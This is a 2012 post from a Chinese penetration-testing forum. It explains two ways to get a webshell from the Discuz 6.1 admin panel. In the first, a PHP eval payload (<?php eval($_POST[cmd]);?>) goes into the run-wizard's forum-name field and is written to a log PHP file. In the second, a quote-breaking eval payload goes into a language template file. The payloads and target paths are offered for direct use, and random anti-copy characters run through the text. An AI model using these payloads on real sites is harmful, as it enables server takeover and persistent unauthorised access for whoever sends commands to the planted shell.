找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 discuz6.1后台拿shell方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2367|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell
! C( z$ a! B- u* L' D6 O; v, W好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
# m8 F; {. Z. i1:' {, C$ o3 Y# V, j9 F5 I
http://127.0.0.1/discuz/admincp. ... zard&frames=yes' e- X1 ^$ h+ }: u  N& H# ^
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
  R% M1 K+ _' W1 f$ U4 s8 ^* o5 K  r* s8 v<?php eval($_POST[cmd]);?>4 f; s# V; L1 D" t& s4 z/ T
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
3 [- B; o" z/ o/ |2 [- H2 Z, t
$ d% T2 @% B- N' k4 F4 k; \2 k8 U$ R- K
2:后台模板管理--默认模板套系--详情2 m9 n/ w' g# a& _: ~, E
templates/default/actions.lang.php7 t- x  M& v/ Y
jhackj\\');eval($_POST[cmd])?>;//
- Q; `0 ?" j+ m% S% [) V
( v3 o$ N  O( g( E' }利用很简单,聪明的人一看就懂了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表